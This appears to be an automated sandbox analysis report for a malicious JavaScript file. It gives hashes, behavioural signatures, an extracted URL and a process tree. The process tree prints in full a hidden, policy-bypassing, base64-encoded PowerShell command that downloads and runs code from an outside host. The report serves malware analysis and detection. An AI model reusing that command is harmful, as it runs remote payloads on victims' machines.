Analysis
-
max time kernel
122s -
max time network
161s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
01/01/2024, 04:04
Static task
static1
Behavioral task
behavioral1
Sample
3bd82a397118d8025093599547826b61.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
3bd82a397118d8025093599547826b61.js
Resource
win10v2004-20231215-en
General
-
Target
3bd82a397118d8025093599547826b61.js
-
Size
101KB
-
MD5
3bd82a397118d8025093599547826b61
-
SHA1
30b0ed277b1d5a5c41d18b1f1e326cac0fd4f7e2
-
SHA256
1a5b5b5be3a34438d690a46e62aa4818bbe6df42729161ed1c1a65844f217b67
-
SHA512
3281ab8874114c89e33ea98179fa67cc7ef17b87b10bc6522baaa6a12c59b5fa6e162db3a23ab268b9fa46852e0709923aa026d61ab3b15544fbbadf86c7b0a8
-
SSDEEP
3072:59Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kV8Gd5bzIvt/4g5eaXu:59Ry9RuXqW4SzUHmLKeMMU7GwWBPwVG7
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2228 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2228 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2228 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2620 wrote to memory of 2616 2620 wscript.exe 31 PID 2620 wrote to memory of 2616 2620 wscript.exe 31 PID 2620 wrote to memory of 2616 2620 wscript.exe 31 PID 2616 wrote to memory of 2228 2616 cmd.exe 29 PID 2616 wrote to memory of 2228 2616 cmd.exe 29 PID 2616 wrote to memory of 2228 2616 cmd.exe 29
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\3bd82a397118d8025093599547826b61.js1⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228